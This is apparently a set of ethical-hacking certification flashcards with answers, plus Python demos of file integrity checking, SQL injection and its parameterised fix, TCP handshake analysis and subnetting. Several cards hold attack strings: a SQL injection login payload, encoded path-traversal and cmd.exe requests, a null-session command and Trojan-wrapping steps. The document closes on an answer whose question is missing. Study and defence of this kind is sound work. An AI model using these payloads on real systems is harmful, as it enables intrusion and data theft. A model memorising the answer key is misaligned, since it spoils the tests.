You are an ethical hacker. You recently gained consent from an online healthcare service company to begin a series of penetration tests. These tests should only be performed during off-peak hours on Saturday and Sunday, so as not to greatly affect existing patients. You identify a SQL injection vulnerability in the account logon form. Which of the following actions would most likely NOT violate your professional code of conduct? A)Perform a Boolean-based blind SQL injection attack, and include the results in the audit report. B)Perform a WAITFOR DELAY blind SQL injection attack, and run an endless loop to stall database services. C)Perform a standard SQL injection attack, and retrieve patient records to attach to the audit report. D)Perform a standard SQL injection attack, and drop all tables required for appointment information.

A) APNIC

You are asked to test a client headquartered in Japan. Which regional registry should you begin competitive intelligence research with? A) APNIC B) RIPE C) ASIANIC D) ARIN E) LACNIC

A. > server ADNS_SERVER ... > set type=HINFO > ATARGET_SYSTEM ...

You are attempting to find out the operating system and CPU type of systems in your target organization. The DNS server you wish to use for lookup is named ADNS_Server, and the target machine you want the information on is ATARGET_SYSTEM. Which of the following nslookup command series is the best choice for discovering this information? (The output of the commands is redacted.) A. > server ADNS_SERVER ... > set type=HINFO > ATARGET_SYSTEM ... B. > server ATARGET_SYSTEM ... > set type=HINFO > ADNS_SERVER ... C. > server ADNS_SERVER ... > set ATARGET_SYSTEM > type=HINFO ... D. > server type=HINFO ... > set ADNS_SERVER > ATARGET_SYSTEM ...

D)23

You are concerned about an employee's use of Telnet when connecting to routers and switches to administer these devices. You would like to perform a port scan on all of these devices to identify any that are still enabled for Telnet. Which open port number(s) are you looking for in the results? A)80 B)21 C)135 to 139 D)23

D)Black box

You are concerned about external hackers gaining control of a new web application. With that threat actor in mind, which of the following tests would be appropriate? A)White box B)Gray box C)Clear box D)Black box

http://www.verigon.com/script.ext?template=%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %0D%70%61%73%73%77%64 = passwd

You are concerned that your Web server could be attacked with an obfuscated URL. You want to configure a rule on the IDS to alert you when a strange Unicode request occurs. Which of the following is an example of a strange Unicode request? A)GET /scripts/..%255c../windows/system32/cmd.exe?/c+dir HTTP/1.1 200 B)GET /cgi- bin/cvslog.cgi=<SCRIPT>management.alert</SCRIPT> HTTP/1.1 403 C)GET /AAAAAAAAAAAAAAAAAAAA\ x90\x90\x90\x83\xec\x27\xeb\x0c\xe7\xe1\xe6\xc1\xc0\xff 500 D)http://www.verigon.com/script.ext?template=%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %0D%70%61%73%73%77%64 = passwd

D)permit 220.60.6.6 192.168.5.62/29 RDP 3389

You are configuring a firewall to allow the CTO to connect remotely to a number of workstations located in the corporate network. The CTO will use his company-issued notebook with a remote IP address of 220.60.6.6. The corporate network contains hosts in the 192.168.5.62/29 range. Which firewall rule should be added to allow the required RDP connections? A)permit 192.168.5.56/29 220.60.6.6 RDP 3389 B)permit 220.60.6.6 192.168.5.0/29 RDP 3389 C)permit 220.60.6.6 192.168.5.62/29 RDP 443 D)permit 220.60.6.6 192.168.5.62/29 RDP 3389

B)Add a rule to allow ICMP Fragmentation-DF-Set messages to enter the network, but not to leave it. D)Add a rule to allow TTL-Exceed and Port-Unreachable messages to only enter the network, not to leave it. E)Add a rule to only allow ICMP Echo-Request and Echo Reply messages for connections originating from within the network.

You are configuring your corporate firewall. You must prevent anyone from outside the network from using traceroute to gather information about your network while still allowing the use of the tool within the network. Which actions can you take? (Choose all that apply.) A)Add a rule to allow ICMP Fragmentation-DF-Set messages to leave the network, but not to enter it. B)Add a rule to allow ICMP Fragmentation-DF-Set messages to enter the network, but not to leave it. C)Add a rule to allow TTL-Exceed and Port-Unreachable messages to only leave the network, not to enter it. D)Add a rule to allow TTL-Exceed and Port-Unreachable messages to only enter the network, not to leave it. E)Add a rule to only allow ICMP Echo-Request and Echo Reply messages for connections originating from within the network. F)Add a rule to only allow ICMP Echo-Request and Echo Reply messages for connections originating from outside the network.

A)Triple-homed bastion host

You are consulting with a company on how best to implement a firewall architecture to meet their needs. The company is a cloud service provider that must allow access to virtual machines and other virtual services while denying access to development and other internal services. Only paying customers and their clients should be allowed access to virtual services. The company requires the highest security solution to optimize availability to their paying customers. Which boundary protection appliance should you recommend they include to meet their requirements? A)Triple-homed bastion host B)High-interaction honeypot C)Dual-homed bastion host D)Low-interaction honeypot

B)Bottom-of-Stack D)Label E)Time-to-Live F)Traffic Class

You are describing to a team member how multiprotocol label switching (MPLS) is implemented to handle VPN traffic across the Internet. MPLS prefixes label stack entries to each network packet. Which fields comprise a label stack entry? (Choose all that apply.) A)Checksum B)Bottom-of-Stack C)Destination Port D)Label E)Time-to-Live F)Traffic Class G)Offset H)Source Port

C)Negligence and liability

You are engaging a penetration testing provider to identify possible vulnerabilities within your organization. You are about to sign the confidentiality agreement and non-disclosure agreement (NDA). What should you verify in the legal language before signing them? A)Checklist of testing requirements B)Rules of engagement C)Negligence and liability D)Fees and project schedule

A. Public (read-only) and Private (read/write)

You are enumerating a subnet. While examining message traffic, you discover SNMP is enabled on multiple targets. If you assume default settings in setting up enumeration tools to use SNMP, which community strings should you use? A. Public (read-only) and Private (read/write) B. Private (read-only) and Public (read/write) C. Read (read-only) and Write (read/write) D. Default (both read and read/write)

D. 52.93.31.255

You are examining a host with an IP address of 52.93.24.42/20 and want to determine the broadcast address for the subnet. Which of the following is the correct broadcast address for the subnet? A. 52.93.24.255 B. 52.93.0.255 C. 52.93.32.255 D. 52.93.31.255 E. 52.93.255.255

A. The host will be attempting to retrieve an HTML file. D. The packet returned in answer to this SYN request will acknowledge the sequence number by returning 10.

You are examining a packet capture of all traffic from a host on the subnet. The host sends a segment with the SYN flag set in order to set up a TCP communications channel. The destination port is 80, and the sequence number is set to 10. Which of the following statements are not true regarding this communications channel? (Choose all that apply.) A. The host will be attempting to retrieve an HTML file. B. The source port field on this packet can be any number between 1024 and 65535. C. The first packet from the destination in response to this host will have the SYN and ACK flags set. D. The packet returned in answer to this SYN request will acknowledge the sequence number by returning 10.

A) The password policy for the machine is weak

You are examining captured LM hash passwords. Several of the passwords hashes in the file end in "1404EE". Which of the following is true? A) The password policy for the machine is weak B) The password policy for this machine is strong C) The hashes have been salted D) The same password has been used for many accounts

C) Establish a null session for 210.55.44.66

You are examining log files and come across this command line entry: net use \\210.55.44.66\IPC$ "" /u:"" What is this attempting to do? A) Create a listening port on 210.55.44.66 B) Perform a denial of service attack on 210.55.44.66 C) Establish a null session for 210.55.44.66 D) Connect to a Linux machine

D. A firewall is prohibiting connection.

You are examining traffic and notice an ICMP Type 3, Code 13 response. What does this normally indicate? A. The network is unreachable. B. The host is unknown. C. Congestion control is enacted for traffic to this host. D. A firewall is prohibiting connection.

B. It appears to be part of an XMAS scan. D. It appears port 4083 is closed.

You are examining traffic between hosts and note the following exchange (Source, Prot, Port, Flag, Destination): 192.168.5.12 TCP 4082 FIN/URG/PSH -> 192.168.5.50; 192.168.5.12 TCP 4083 FIN/URG/PSH -> 192.168.5.50; 192.168.5.12 TCP 4084 FIN/URG/PSH -> 192.168.5.50; 192.168.5.50 TCP 4083 RST/ACK -> 192.168.5.12; 192.168.5.12 TCP 4085 FIN/URG/PSH -> 192.168.5.50. Which of the following statements are true regarding this traffic? (Choose all that apply.) A. It appears to be part of an ACK scan. B. It appears to be part of an XMAS scan. C. It appears port 4083 is open. D. It appears port 4083 is closed.

A)0x0182bd0bd4444bf836077a718ccdf409

You are hardening the CEO's laptop against boot sector viruses by setting the MBR to read-only and enabling password protection in the system BIOS. The BIOS uses a hashing algorithm similar to LAN Manager to generate a checksum that is stored on the FlashROM. Based on the following checksums, which password is the most secure? A)0x0182bd0bd4444bf836077a718ccdf409 B)0x0182bd0bd4444bf8aad3b435b51404ee C)0xaebd4de384c7ec43aad3b435b51404ee D)0x44efce164ab921caaad3b435b51404ee

D)Perform a risk assessment

You are heading a committee that is responsible for creating your company's security policies. What should you do FIRST? A)Train and educate users about security awareness B)Develop the new security policies based on company needs C)Collect standard guidelines to help guide the committee D)Perform a risk assessment

B)echo bad stuff > good.txt:shh

You are identifying system vulnerabilities on a NTFS system. Which of the following command-line statements is an example of alternate data streams (ADS)? A)type bad stuff < good.txt;shh B)echo bad stuff > good.txt:shh C)echo bad stuff > good.txt;shh D)type bad stuff < good.txt:shh

D)Integrity

You are implementing MD5 hashing for all read-only files on critical company servers. If any files are tampered with, then the MD5 hash value will not match. Which element of information security does MD5 hashing provide? A)Confidentiality B)Availability C)Non-repudiation D)Integrity
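The card above states the principle; the following is an added Python example (not from the original flashcards) of how such a check is actually run: a baseline of file digests is recorded, and a later pass reports files that were modified, removed or added. It runs against a constructed temporary directory, not real server files. The digest algorithm is a parameter because MD5 is no longer collision resistant; for a real deployment pass "sha256".

```python
import hashlib
import tempfile
from pathlib import Path


def file_digest(path, algo="md5", chunk=65536):
    """Hex digest of a file, read in chunks so large files do not need to fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root, algo="md5"):
    """Map of relative path -> digest for every regular file under root."""
    root = Path(root)
    return {
        str(p.relative_to(root)): file_digest(p, algo)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def verify_baseline(root, baseline, algo="md5"):
    """Compare the current tree against a stored baseline; any difference is an integrity failure."""
    current = build_baseline(root, algo)
    return {
        "modified": sorted(k for k in baseline if k in current and current[k] != baseline[k]),
        "missing": sorted(k for k in baseline if k not in current),
        "added": sorted(k for k in current if k not in baseline),
    }


def demo():
    """Self-contained run on a constructed temp directory: take a baseline, tamper, verify."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "index.html").write_text("<h1>welcome</h1>")
        (root / "config.ini").write_text("debug=0")
        baseline = build_baseline(root)
        # simulated tampering: edit one file, delete one, drop a new one
        (root / "index.html").write_text("<h1>defaced</h1>")
        (root / "config.ini").unlink()
        (root / "webshell.php").write_text("<?php /* constructed placeholder */ ?>")
        return verify_baseline(root, baseline)


if __name__ == "__main__":
    print(demo())
```

The baseline itself must be stored somewhere the attacker cannot rewrite (off-host or signed), otherwise a tamperer simply updates the digests along with the files.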

A)Filter user input with client-side validation and use parameter placeholders.

You are investigating a Perl script that contains the following code: my $user = $q->param('username'); my $pwd = $q->param('password'); my $sth = $dbh->prepare("SELECT authcode FROM customers WHERE uname = '$user' AND pwd = '$pwd'"); $sth->execute(); Which modification(s), if any, should you make to prevent SQL injection attacks? A)Filter user input with client-side validation and use parameter placeholders. B)Add robust error handling for user input and provide detailed client-side messages. C)Encrypt all user input on the client-side and tables and columns in the database. D)No modification is necessary.

B)Bind the compilation file (.exe) to winlogon.exe

You are learning to create Trojans by using wrapper tools. You write the following endless loop: #include <iostream> using namespace std; int main( ) { bool done = false; while (!done) { cerr << "Warning, Warning--Trojan running--Warning! Warning!" << endl; } } How would you use a wrapper tool to hide this malware inside of the legitimate Windows executable winlogon.exe? A)Bind the library file (.lib) to winlogon.exe B)Bind the compilation file (.exe) to winlogon.exe C)Bind the declaration file (.h) to winlogon.exe D)Bind the implementation file (.cpp) to winlogon.exe

B. allintitle:CEH V9

You are looking for pages with the terms CEH and V9 in their title. Which Google hack is the appropriate one? A. inurl:CEHinurl:V9 B. allintitle:CEH V9 C. intitle:CEHinurl:V9 D. allinurl:CEH V9

A. intitle:intranet inurl:intranet+intext:"human resources"

You are looking for information on an organization and would like to see what human resources information may be available publicly. Which of the following Google searches look for a website title of "intranet" with part of the URL containing the word "intranet" and the words "human resources" somewhere in the web page? A. intitle:intranet inurl:intranet+intext:"human resources" B. site:"human resources"+intext:intranet C. cache:"human resources"site:sharepoint+inurl:intranet D. related:human resources inurl:intranet

D) The firewall for the DMZ subnet is not performing stateful inspection

You are performing an ACK scan against a network from an external location. You've identified two web servers on the DMZ subnet and notice that they are responding to the ACK scan. Which of the following best describes the situation? A) They are both IIS servers B) They are both Apache servers C) The IDS is not functioning for the DMZ subnet D) The firewall for the DMZ subnet is not performing stateful inspection

C. Stateful

You are performing an ACK scan against a target subnet. You previously verified connectivity to several hosts within the subnet but want to verify all live hosts on the subnet. Your scan, however, is not receiving any replies. Which type of firewall is most likely in use at your location? A. Packet filtering B. IPS C. Stateful D. Active

D)192.168.1.65-126

You are performing an internal scan of a private subnet with the following command: hping3 -1 192.168.1.127 All hosts are configured with the subnet mask 255.255.255.192. Which IP address or range of addresses will be scanned as a result of running this command? A)192.168.1.127 B)192.168.1-254 C)192.168.1.1-126 D)192.168.1.65-126

A. The response indicates an open port.

You are port scanning a system and begin sending TCP packets with the ACK flag set. Examining the return packets, you see a return packet for one port has the RST flag set and the TTL is less than 64. Which of the following is true? A. The response indicates an open port. B. The response indicates a closed port. C. The response indicates a Windows machine with a non-standard TCP/IP stack. D. ICMP is filtered on the machine.

C)Security assessment F)Incident response G)Security training

You are presenting a proposal to the company CEO on engaging Foundstone for IT security services. Which of the following solution(s) does Foundstone provide? (Choose all that apply.) A)Cyberinsurance B)Business continuity planning C)Security assessment D)Grayhat hacking E)Cloud storage security F)Incident response G)Security training

C)The system was compromised.

You are responsible for reviewing the event logs for several servers. Auditing is enabled on all the computers. Recently during a review, you noticed that there is a four-hour gap in the events contained in the security event log for one server. The security event log contains events before and after the four-hour gap. You check the other logs on the same server and do not notice any time gaps. What is most likely the reason for this time gap in the security event log? A)The system was not running. B)The security event log was full. C)The system was compromised. D)Auditing was disabled on the system.

B)Store all tapes in a secured location on site

You are reviewing a company's backup and recovery procedures. Which of the following practices will increase the likelihood of failure during tape recovery? A)Restore backups on a regular basis B)Store all tapes in a secured location on site C)Rotate backups across multiple tapes D)Perform read-after-write and full verification

D) SNMP walk

You are reviewing log files and results from a day of penetration testing. Examine this small section of scan results: ... System.sysUpTime.0 : Timeticks: (136589017) 13 days, 14:47:30 System.sysContact.0 : DISPLAY STRING- (ascii): System.sysName.0 : DISPLAY STRING- (ascii): Router 1 System.sysLocation.0 : DISPLAY STRING- (ascii): ... Which scan or attack was used to generate this output? A) Nmap XMAS scan B) Hping session hijack attempt C) Firewalk D) SNMP walk

A)Change to extractedDataLength >= 65536

You are reviewing source code for any buffer overflow vulnerabilities. The following C++ source code handles data extracted from a compressed file: if (extractedDataLength < 65536) { //Break down data into multiple chunks } else { //Handle data in one large chunk } The data should be broken down into multiple chunks only when the buffer of 65,536 characters is reached or exceeded. How should you modify the condition in the first line of the code? A)Change to extractedDataLength >= 65536 B)Change to extractedDataLength == 65536 C)Change to extractedDataLength <= 65536 D)Change to extractedDataLength > 65536

D)SQL injection

You are reviewing the log files for your company's primary Web server. You notice that there are several instances where the following request is made: SELECT login_id, full_name FROM customers Which attack type could this represent? A)Buffer overflow B)Cross-site scripting C)Cross-site request forgery D)SQL injection

D)-sC

You are running a high-level vulnerability scan using the Nmap utility. The network systems include Windows machines running Internet Information Service (IIS). Which switch should you use to automate and customize vulnerability scanning for different Windows OS and SSL vulnerabilities? A)-sU B)--webxml C)-sO D)-sC

A)There is no stateful firewall installed on the DMZ perimeter.

You are scanning a company's DMZ perimeter using Nmap: sudo nmap -sA 62.77.0.1 Starting Nmap 6.49 ( https://nmap.org ) at 2016-05-09 17:00 EDT Nmap scan report for 62.77.0.1 Host is up (0.013s latency). All 1000 scanned ports on 62.77.0.1 are unfiltered MAC Address: 28:C6:8E:79:4D:22 (Netgear) Nmap done: 1 IP address (1 host up) scanned in 1.88 seconds Which of the following statements is true of the Nmap results? A)There is no stateful firewall installed on the DMZ perimeter. B)There is a stateful firewall installed on the DMZ perimeter. C)All ports are closed on the DMZ firewall. D)All ports are open on the DMZ firewall.

D. Use HTTP tunneling.

You are separated from your target subnet by a firewall. The firewall is correctly configured and allows requests only to ports opened by the administrator. In firewalking the device, you find that port 80 is open. Which technique could you employ to send data and commands to or from the target system? A. Encrypt the data to hide it from the firewall. B. Use session splicing. C. Use MAC flooding. D. Use HTTP tunneling.

E. CNAME

You are setting up DNS for your enterprise. Server A is both a web server and an FTP server. You want to advertise both services for this machine as name references your customers can use. Which DNS record type would you use to accomplish this? A. NS B. SOA C. MX D. PTR E. CNAME

B)SQL injection

You are testing a web application for a travel service. The web application uses a back-end database to store customer accounts and itineraries. You enter the following username value into the customer registration form: ' or 1=1 -- Which type of attack are you attempting? A)XSS B)SQL injection C)SYN Flood D)CSRF
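The Perl card earlier (uname and pwd interpolated straight into the SELECT) and the ' or 1=1 -- payload in this card are the two halves of the same bug. The following is an added Python example, not code from the original flashcards, using an in-memory SQLite database with constructed sample rows: vulnerable_lookup reproduces the Perl string interpolation, safe_lookup uses parameter placeholders as the earlier card's answer recommends, and the same payload is run against both.

```python
import sqlite3

# Constructed sample data for the demo (not real accounts)
SAMPLE_CUSTOMERS = [
    ("alice", "s3cret", "AUTH-1001"),
    ("bob", "hunter2", "AUTH-1002"),
]


def build_db():
    """In-memory customers table shaped like the one the Perl script queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (uname TEXT, pwd TEXT, authcode TEXT)")
    conn.executemany("INSERT INTO customers VALUES (?, ?, ?)", SAMPLE_CUSTOMERS)
    return conn


def vulnerable_lookup(conn, user, pwd):
    """Mirrors the Perl card: user input is spliced into the SQL text itself."""
    sql = f"SELECT authcode FROM customers WHERE uname = '{user}' AND pwd = '{pwd}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_lookup(conn, user, pwd):
    """Parameter placeholders: the driver sends values separately, so a quote in
    the input can never terminate the string literal or start a comment."""
    sql = "SELECT authcode FROM customers WHERE uname = ? AND pwd = ?"
    row = conn.execute(sql, (user, pwd)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    payload = "' or 1=1 --"   # the username from the travel-service card
    print("vulnerable:", vulnerable_lookup(db, payload, "anything"))  # leaks alice's authcode
    print("safe:      ", safe_lookup(db, payload, "anything"))        # None: no such user
```

With the payload, the interpolated query becomes WHERE uname = '' or 1=1 --' AND pwd = 'anything': the -- comments out the password check and 1=1 matches every row, so the first customer's authcode comes back. The placeholder version compares the literal string ' or 1=1 -- against uname and finds nothing. Client-side validation, the other half of the card's answer, is trivially bypassed with a proxy and is not a defence on its own.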

Network Tools Pro

_____ assists in troubleshooting, diagnosing, monitoring and discovering devices on the network

D)Enforce the company security policy.

You are the security administrator for your company. You write security policies and conduct assessments to protect the company's network. An IT technician reports that he has discovered an unauthorized wireless access point attached to the company network. An employee has used the wireless access point to connect several of his personal devices to the network. Employees are not allowed to connect any personal devices to the network without prior consent from their supervisor and the IT department head. The employee explains that he used the wireless access point because he needed company data on his personal devices. What should you do? A)Configure the firewall to prevent such incidents in the future. B)Allow the devices to remain attached because the reason is sound. C)Configure the IDS to prevent such incidents in the future. D)Enforce the company security policy.

C)Network sniffer

You are thinking like a potential attacker. MAC flooding can compromise the security of your network switches. Once the attack is successful, the attacker could capture sensitive data being transmitted between other computers. Which other tool would an attacker need to complete this objective? A)Password cracker B)Vulnerability scanner C)Network sniffer D)Port scanner

A)yes

You are using NetCat to send TCP messages between two Linux hosts. Both hosts should keep sending data until the either host terminates the session. Which Linux command should you pipe to NetCat? A)yes B)echo C)wait D)tar

B)Layer 2 broadcast frame

You are using a sniffer and you see a frame with a destination address of 0xFFFFFFFFFFFF. What type of frame is this? A)Layer 3 broadcast address B)Layer 2 broadcast frame C)Layer 3 network ID D)Layer 2 network ID

C)The host decrements the TTL value by one and forwards the packet to the next host.

You are using traceroute to map the route packets travel over a network. Which of the following statements is true when using this tool? A)The host decrements the TTL value by one and returns the packet to the previous host. B)The host increments the TTL value by one and forwards the packet to the next host. C)The host decrements the TTL value by one and forwards the packet to the next host. D)The host increments the TTL value by one and returns the packet to the previous host.

B)Incident response is part of incident handling, and incident handling is part of incident management.

You are working with another security professional to design your company's incident response procedures. Which of the following statements is true? A)Incident management is part of incident response, and incident response is part of incident handling. B)Incident response is part of incident handling, and incident handling is part of incident management. C)Incident handling is part of incident response, and incident response is part of incident management. D)Incident response is part of incident management, and incident management is part of incident handling.

C)With the POST method and HTTPS (TLS)

You are working with the web site of an online university. The admissions department requires Social Security numbers (SSN) as personally identifiable information (PII) to associate students with their financial aid packages. The student's SSN should not be available to man-in-the-middle attacks. How should the SSNs be sent to the web server? A)With the GET method and HTTPS (SSL) B)With the POST method and HTTP C)With the POST method and HTTPS (TLS) D)With the GET method and HTTP

C)Healthcare records

You are your company's security administrator. Your company has recently opened a new division. The division head explains to you the Privacy Rule for HIPAA. Which type of record is affected by this? A)Employee records B)Credit card records C)Healthcare records D)Financial records

company's infrastructure details

You can gather ____ from job postings

B)Acknowledgement of a data packet

You capture the following TCP frames using Wireshark: 343 61.586595 208.44.193.36 192.168.1.3 TCP [TCP segment of a reassembled PDU] 344 61.590149 192.168.1.3 208.44.193.36 TCP 3202 > http [FIN, ACK] Seq=986 Ack=25462 Win=17520 Len=0 345 61.590208 208.44.193.36 192.168.1.3 HTTP HTTP/1.1 404 Not Found (text/html) 346 61.590264 192.168.1.3 208.44.193.36 TCP 3203 > http [RST, ACK] Seq=987 Ack=25797 Win=0 Len=0 347 66.229719 192.168.1.3 208.44.193.36 TCP 3206 > http [SYN] Seq=0 Len=0 MSS=1460 348 66.369449 208.44.193.36 192.168.1.3 TCP http > 3206 [SYN, ACK] Seq=0 Ack=1 Win=1460 Len=0 MSS=1460 349 66.369526 192.168.1.3 208.44.193.36 TCP 3206 > http [ACK] Seq=1 Ack=1 Win=17520 Len=0 350 66.369745 192.168.1.3 208.44.193.36 HTTP GET /images/product-images/practicetest/Image:cert-312-50.png HTTP/1.1 351 66.736536 208.44.193.36 192.168.1.3 TCP http > 3206 [ACK] Seq=1 Ack=625 Win=63616 Len=0 352 66.913117 208.44.193.36 192.168.1.3 TCP [TCP segment of a reassembled PDU] 353 66.927650 208.44.193.36 192.168.1.3 TCP [TCP segment of a reassembled PDU] 354 66.927706 192.168.1.3 208.44.193.36 TCP 3206 > http [ACK] Seq=625 Ack=2025 Win=17520 Len=0 355 66.948746 192.168.1.3 208.44.193.36 TCP 3207 > http [SYN] Seq=0 Len=0 MSS=1460 356 67.145268 208.44.193.36 192.168.1.3 TCP [TCP Previous segment lost] [TCP segment of a reassembled PDU] What is the purpose of frame 354? A)Final acknowledgement in a TCP handshake B)Acknowledgement of a data packet C)First step in the TCP handshake D)Second step in the TCP handshake
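The reasoning behind this card and the earlier one about a SYN with sequence number 10 (the SYN/ACK must acknowledge 11, and a port-80 destination does not by itself mean an HTML file) can be automated. The following is an added Python example, not from the original flashcards: it parses Wireshark-style summary lines, tracks the three-way handshake per flow, flags a SYN/ACK whose acknowledgement number is not ISN+1, and labels later ACKs in an established flow as acknowledgements of data. The sample lines are constructed to resemble frames 347 to 354 above; they are not a real capture.

```python
import re

# Constructed summary lines modelled on the card's frames (not a real capture)
SAMPLE_FRAMES = [
    "347 66.229719 192.168.1.3 208.44.193.36 TCP 3206 > http [SYN] Seq=0 Len=0 MSS=1460",
    "348 66.369449 208.44.193.36 192.168.1.3 TCP http > 3206 [SYN, ACK] Seq=0 Ack=1 Win=1460 Len=0 MSS=1460",
    "349 66.369526 192.168.1.3 208.44.193.36 TCP 3206 > http [ACK] Seq=1 Ack=1 Win=17520 Len=0",
    "350 66.369745 192.168.1.3 208.44.193.36 HTTP GET /images/example.png HTTP/1.1",
    "351 66.736536 208.44.193.36 192.168.1.3 TCP http > 3206 [ACK] Seq=1 Ack=625 Win=63616 Len=0",
    "354 66.927706 192.168.1.3 208.44.193.36 TCP 3206 > http [ACK] Seq=625 Ack=2025 Win=17520 Len=0",
]

LINE_RE = re.compile(
    r"^(?P<no>\d+)\s+(?P<time>[\d.]+)\s+(?P<src>\S+)\s+(?P<dst>\S+)\s+TCP\s+"
    r"(?P<sport>\S+) > (?P<dport>\S+) \[(?P<flags>[^\]]+)\](?P<rest>.*)$"
)


def parse_frame(line):
    """One Wireshark summary line -> dict; None for non-TCP or unparseable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    f = m.groupdict()
    nums = dict(re.findall(r"(\w+)=(\d+)", f["rest"]))
    f["flags"] = {x.strip() for x in f["flags"].split(",")}
    f["seq"] = int(nums.get("Seq", 0))
    f["ack"] = int(nums["Ack"]) if "Ack" in nums else None
    return f


def classify_frames(lines):
    """Label each frame number by its role, keeping handshake state per flow."""
    state = {}   # (client, cport, server, sport) -> (stage, client ISN)
    labels = {}
    for line in lines:
        f = parse_frame(line)
        if f is None:
            continue
        flags = f["flags"]
        fwd = (f["src"], f["sport"], f["dst"], f["dport"])
        rev = (f["dst"], f["dport"], f["src"], f["sport"])
        if flags == {"SYN"}:
            state[fwd] = ("syn_sent", f["seq"])
            labels[f["no"]] = "handshake step 1 (SYN)"
            continue
        key = fwd if fwd in state else rev if rev in state else None
        if key is None:
            labels[f["no"]] = "unknown flow"
            continue
        stage, isn = state[key]
        if flags == {"SYN", "ACK"} and key == rev and stage == "syn_sent":
            # the SYN/ACK must acknowledge ISN + 1, not the ISN itself (seq 10 -> ack 11)
            suffix = "" if f["ack"] == isn + 1 else " with wrong ack"
            state[key] = ("syn_received", isn)
            labels[f["no"]] = "handshake step 2 (SYN/ACK)" + suffix
        elif flags == {"ACK"} and key == fwd and stage == "syn_received":
            state[key] = ("established", isn)
            labels[f["no"]] = "handshake step 3 (final ACK)"
        elif "ACK" in flags and stage == "established":
            # once established, an ACK whose number has advanced acknowledges payload bytes
            labels[f["no"]] = "acknowledgement of data"
        else:
            labels[f["no"]] = "other"
    return labels


if __name__ == "__main__":
    for no, label in classify_frames(SAMPLE_FRAMES).items():
        print(no, label)
```

Frame 354's Ack=2025 on an established flow is therefore an acknowledgement of the 2024 bytes the server has sent since the handshake, not part of the handshake itself.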

B)126.123.64.0/19

You detect an attempted ICMP echo scan using the broadcast address 126.123.95.255. You need to determine which network devices were potential targets. Which subnet was likely targeted by the scan? A)126.123.64.0/17 B)126.123.64.0/19 C)126.123.64.0/18 D)126.123.64.0/20
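Three cards in this set come down to the same subnet arithmetic: the broadcast address of 52.93.24.42/20, which hosts a directed-broadcast ping to 192.168.1.127 reaches on a /26, and which subnet an echo scan aimed at 126.123.95.255 was targeting. The following is an added Python example, not from the original flashcards, that does that arithmetic with the standard ipaddress module. Note that a broadcast address on its own does not fix the prefix length (126.123.95.255 is also the broadcast of 126.123.80.0/20 and of 126.123.88.0/21), so the last function tests candidate subnets rather than deriving one.

```python
import ipaddress


def broadcast_of(host_cidr):
    """Broadcast address of the subnet containing host_cidr, e.g. '52.93.24.42/20'."""
    return str(ipaddress.ip_interface(host_cidr).network.broadcast_address)


def is_directed_broadcast(host_cidr):
    """True when the address in host_cidr is its subnet's directed-broadcast address
    (an ICMP echo sent there, e.g. hping3 -1, is answered by every host that honours it)."""
    iface = ipaddress.ip_interface(host_cidr)
    return iface.ip == iface.network.broadcast_address


def usable_host_range(host_cidr):
    """(first, last) usable host address of the subnet containing host_cidr."""
    hosts = list(ipaddress.ip_interface(host_cidr).network.hosts())
    return str(hosts[0]), str(hosts[-1])


def subnets_with_broadcast(bcast, candidate_cidrs):
    """Candidates whose directed broadcast equals bcast. Several prefix lengths can share
    one broadcast address, so compare the options rather than inferring a prefix."""
    target = ipaddress.ip_address(bcast)
    matches = []
    for cidr in candidate_cidrs:
        net = ipaddress.ip_network(cidr, strict=False)  # tolerate host bits set in an option
        if net.broadcast_address == target:
            matches.append(cidr)
    return matches


if __name__ == "__main__":
    print(broadcast_of("52.93.24.42/20"))                 # 52.93.31.255
    print(is_directed_broadcast("192.168.1.127/26"))       # True
    print(usable_host_range("192.168.1.127/26"))           # ('192.168.1.65', '192.168.1.126')
    options = ["126.123.64.0/17", "126.123.64.0/19", "126.123.64.0/18", "126.123.64.0/20"]
    print(subnets_with_broadcast("126.123.95.255", options))  # ['126.123.64.0/19']
```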

D)Sniffs NFS traffic on the network

You discover that an attacker has used filesnarf to attack your network. Which of the following best describes what this tool does? A)Discovers hosts and services on a computer network. B)Automates the import of log data from over 200 common network devices C)Floods a switched LAN with random MAC addresses D)Sniffs NFS traffic on the network

Unable to connect to the Internet, but able to connect to other wireless stations

You have 25 computers connected to a wireless access point that is providing an IP address in the 192.168.5.0/24 network and a default gateway address 192.168.5.1/24 to the clients. If the default gateway is not routing traffic sent to the gateway to a public IP address, how will clients be affected? A)Unable to connect to the Internet or to other wireless stations B)Able to connect to the Internet and to other wireless stations C)Able to connect to the Internet, but unable to connect to other wireless stations D)Unable to connect to the Internet, but able to connect to other wireless stations

A. ip.addr==192.168.22.5 && tcp contains HR_admin

You have a large packet capture file in Wireshark to review. You want to filter traffic to show all packets with an IP address of 192.168.22.5 that contain the string HR_admin. Which of the following filters would accomplish this task? A. ip.addr==192.168.22.5 && tcp contains HR_admin B. ip.addr 192.168.22.5 && "HR_admin" C. ip.addr 192.168.22.5 && tcp string == HR_admin D. ip.addr==192.168.22.5 + tcp contains tide

A. Your IDLE scan results will not be useful to you.

You have a zombie system ready and begin an IDLE scan. As the scan moves along, you notice that fragment identification numbers gleaned from the zombie machine are incrementing randomly. What does this mean? A. Your IDLE scan results will not be useful to you. B. The zombie system is a honeypot. C. There is a misbehaving firewall between you and the zombie machine. D. This is an expected result during an IDLE scan.

E)Acquisition

You have been asked to perform a thorough vulnerability assessment for your company's file server. You must ensure that you complete all of the appropriate steps for the assessment. What is the first step or phase? A)Evaluation B)Identification C)Analyzing D)Generating reports E)Acquisition

C)ISO/IEC 27001:2013

You have been hired as a consultant for a company. You have been asked to provide guidance on establishing, implementing, maintaining, and improving their information security management system. They ask that you provide recommendations based on industry standards. Which of the following standard should you use? A)SOX B)PCI-DSS C)ISO/IEC 27001:2013 D)DMCA

A)Medical

